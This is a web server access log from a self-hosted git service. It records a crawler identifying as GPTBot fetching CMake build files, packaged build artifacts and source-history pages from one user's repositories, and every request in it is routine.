"/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10259] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:31:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9973] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:31:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9974] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:31:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9973] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:31:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9973] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:31:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/query" -[17/Feb/2026:17:31:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9952] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/query" -[17/Feb/2026:17:31:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10266] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:31:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:31:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:17:31:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9952] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/query" -[17/Feb/2026:17:31:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/query" -[17/Feb/2026:17:31:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1" -[17/Feb/2026:17:31:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 9897] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:17:31:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 1037] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:17:31:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 10741] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:17:31:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:17:31:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10008] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" -[17/Feb/2026:17:31:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10694] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1" -[17/Feb/2026:17:31:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 11078] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/App.tsx" -[17/Feb/2026:17:31:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10930] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" -[17/Feb/2026:17:31:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10930] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" -[17/Feb/2026:17:31:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10926] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" -[17/Feb/2026:17:31:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10930] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" -[17/Feb/2026:17:31:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10955] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" -[17/Feb/2026:17:31:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10900] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" -[17/Feb/2026:17:31:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:17:31:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:17:31:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:17:31:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:17:31:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/query" -[17/Feb/2026:17:31:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 14333] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:17:31:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11612] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:17:31:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:17:31:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 13143] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply" -[17/Feb/2026:17:31:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10983] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" -[17/Feb/2026:17:31:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10926] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" -[17/Feb/2026:17:31:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10984] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" -[17/Feb/2026:17:31:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10901] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" -[17/Feb/2026:17:31:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10926] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" -[17/Feb/2026:17:31:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10900] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" -[17/Feb/2026:17:31:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/.Notebook/OpcTest%20program%20by%20claude.md" [Client 74.7.227.38] [Length 9855] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/OpcTest%20program%20by%20claude.md" -[17/Feb/2026:17:31:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 2092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" -[17/Feb/2026:17:31:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 14599] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" -[17/Feb/2026:17:31:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 9983] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" -[17/Feb/2026:17:31:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" -[17/Feb/2026:17:31:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 12994] [Gzip 7.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" -[17/Feb/2026:17:31:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10781] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" -[17/Feb/2026:17:31:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9994] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 